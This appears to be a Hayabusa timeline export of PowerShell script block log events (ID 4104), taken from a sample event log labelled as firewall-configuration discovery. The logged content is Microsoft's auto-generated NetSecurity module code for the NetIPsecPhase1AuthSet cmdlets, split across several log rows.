$__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = 
Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} 
$__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Default')) { [object]$__cmdletization_value = ${Default} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletizati",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.942 
+09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"on_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecPhase1AuthSet' function Get-NetIPsecPhase1AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] 
[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] 
[Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = 
@(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not 
$__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecPhase1AuthSet' function Set-NetIPsecPhase1AuthSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.942 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"#root/standardcimv2/MSFT_NetIKEP1AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance[]] 
${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object 
$script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 
'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; 
IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, 
$__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecPhase1AuthSet' function Remove-NetIPsecPhase1AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.942 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, 
